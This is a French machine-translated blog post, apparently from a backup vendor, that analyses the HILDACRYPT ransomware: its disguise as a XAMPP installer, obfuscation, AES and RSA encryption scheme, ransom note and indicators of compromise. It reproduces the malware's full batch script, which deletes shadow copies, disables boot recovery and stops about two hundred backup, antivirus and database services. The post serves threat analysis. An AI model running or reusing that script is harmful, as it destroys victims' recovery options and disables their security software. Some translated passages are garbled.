HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Bonjour Habr! Encore une fois, nous parlons des dernières versions des malwares de la catégorie Ransomware. HILDACRYPT est un nouveau ransomware, membre de la famille Hilda découvert en août 2019, du nom du dessin animé Netflix utilisé pour distribuer le logiciel. Aujourd'hui, nous nous familiarisons avec les caractéristiques techniques de ce virus ransomware mis à jour.

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Dans la première version du ransomware Hilda, un lien vers celui posté sur Youtube remorque Une série de dessins animés était contenue dans la lettre de rançon. HILDACRYPT se fait passer pour un installateur XAMPP légitime, une distribution Apache facile à installer qui inclut MariaDB, PHP et Perl. Dans le même temps, le cryptolocker a un nom de fichier différent - xamp. De plus, le fichier du ransomware ne possède pas de signature électronique.

Analyse statique

Le ransomware est contenu dans un fichier PE32 .NET écrit pour MS Windows. Sa taille est de 135 168 octets. Le code du programme principal et le code du programme Defender sont écrits en C#. Selon la date et l'heure de compilation, le binaire a été créé le 14 septembre 2019.

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Selon Detect It Easy, le ransomware est archivé à l'aide de Confuser et ConfuserEx, mais ces obfuscateurs sont les mêmes qu'auparavant, seul ConfuserEx est le successeur de Confuser, donc leurs signatures de code sont similaires.

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

HILDACRYPT est en effet fourni avec ConfuserEx.

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Vecteur d'attaque

Très probablement, le ransomware a été découvert sur l'un des sites de programmation Web, se faisant passer pour un programme XAMPP légitime.

Toute la chaîne d’infection peut être observée dans bac à sable app.any.run.

Obscurcissement

Les chaînes du ransomware sont stockées sous forme cryptée. Une fois lancé, HILDACRYPT les déchiffre en utilisant Base64 et AES-256-CBC.

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Installation

Tout d'abord, le ransomware crée un dossier dans %AppDataRoaming% dans lequel le paramètre GUID (Globally Unique Identifier) ​​​​​​est généré aléatoirement. En ajoutant un fichier bat à cet emplacement, le virus ransomware le lance à l'aide de cmd.exe :

cmd.exe /c JKfgkgj3hjgfhjka.bat et quitter

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirusHILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus
Il commence ensuite à exécuter un script batch pour désactiver les fonctionnalités ou services du système.

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Le script contient une longue liste de commandes qui détruisent les clichés instantanés, désactivent le serveur SQL, les solutions de sauvegarde et antivirus.

Par exemple, il tente sans succès d'arrêter les services Acronis Backup. De plus, il attaque les systèmes de sauvegarde et les solutions antivirus des fournisseurs suivants : Veeam, Sophos, Kaspersky, McAfee et autres.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

Une fois les services et processus mentionnés ci-dessus désactivés, le cryptolocker collecte des informations sur tous les processus en cours d'exécution à l'aide de la commande tasklist pour garantir que tous les services nécessaires sont indisponibles.
liste des tâches v/fo csv

Cette commande affiche une liste détaillée des processus en cours d'exécution, dont les éléments sont séparés par le signe « ».
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Après cette vérification, le ransomware commence le processus de cryptage.

Шифрование

Cryptage de fichiers

HILDACRYPT parcourt tout le contenu trouvé des disques durs, à l'exception des dossiers Recycle.Bin et Reference AssembliesMicrosoft. Ce dernier contient des fichiers dll, pdb, etc. critiques pour les applications .Net qui peuvent affecter le fonctionnement du ransomware. Pour rechercher les fichiers qui seront cryptés, la liste d'extensions suivante est utilisée :

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

Le ransomware utilise l'algorithme AES-256-CBC pour crypter les fichiers des utilisateurs. La taille de la clé est de 256 bits et la taille du vecteur d'initialisation (IV) est de 16 octets.

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Dans la capture d'écran suivante, les valeurs de byte_2 et byte_1 ont été obtenues aléatoirement à l'aide de GetBytes().

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

clé

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

DANS ET

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Le fichier crypté porte l'extension HCY!.. Ceci est un exemple de fichier crypté. La clé et l'IV mentionnés ci-dessus ont été créés pour ce fichier.

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Chiffrement par clé

Le cryptolocker stocke la clé AES générée dans un fichier crypté. La première partie du fichier crypté a un en-tête qui contient des données telles que HILDACRYPT, KEY, IV, FileLen au format XML, et ressemble à ceci :

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

Le cryptage des clés AES et IV est effectué à l'aide de RSA-2048 et l'encodage est effectué à l'aide de Base64. La clé publique RSA est stockée dans le corps du cryptolocker dans l'une des chaînes cryptées au format XML.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

Une clé publique RSA est utilisée pour chiffrer la clé du fichier AES. La clé publique RSA est codée en Base64 et se compose d'un module et d'un exposant public de 65537. Le déchiffrement nécessite la clé privée RSA, dont dispose l'attaquant.

Après le cryptage RSA, la clé AES est codée en Base64 stockée dans le fichier crypté.

Message de rançon

Une fois le cryptage terminé, HILDACRYPT écrit le fichier html dans le dossier dans lequel il a crypté les fichiers. La notification du ransomware contient deux adresses e-mail auxquelles la victime peut contacter l'attaquant.

HILDACRYPT : Un nouveau ransomware frappe les systèmes de sauvegarde et les solutions antivirus

L'avis d'extorsion contient également la phrase « No loli is safe ;) » – une référence à des personnages d'anime et de manga ayant l'apparence de petites filles interdits au Japon.

conclusion

HILDACRYPT, une nouvelle famille de ransomwares, a publié une nouvelle version. Le modèle de cryptage empêche la victime de décrypter les fichiers cryptés par le ransomware. Cryptolocker utilise des méthodes de protection active pour désactiver les services de protection liés aux systèmes de sauvegarde et aux solutions antivirus. L'auteur de HILDACRYPT est fan de la série animée Hilda diffusée sur Netflix, dont le lien vers la bande-annonce figurait dans la lettre de rachat de la version précédente du programme.

Comme d'habitude Acronis Backup и Acronis True Image peut protéger votre ordinateur contre le ransomware HILDACRYPT, et les fournisseurs ont la possibilité de protéger leurs clients avec Acronis Backup Cloud. La protection est assurée par le fait que ces solutions incluent cybersécurité comprend non seulement la sauvegarde, mais également notre système de sécurité intégré Acronis Active Protection - Propulsé par un modèle d'apprentissage automatique et basé sur des heuristiques comportementales, une technologie capable de contrer la menace des ransomwares zero-day comme aucune autre.

Indicateurs de compromis

Extension de fichier HCY!
HILDACRYPTReadMe.html
xamp.exe avec une lettre "p" et aucune signature numérique
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Source: habr.com

Ajouter un commentaire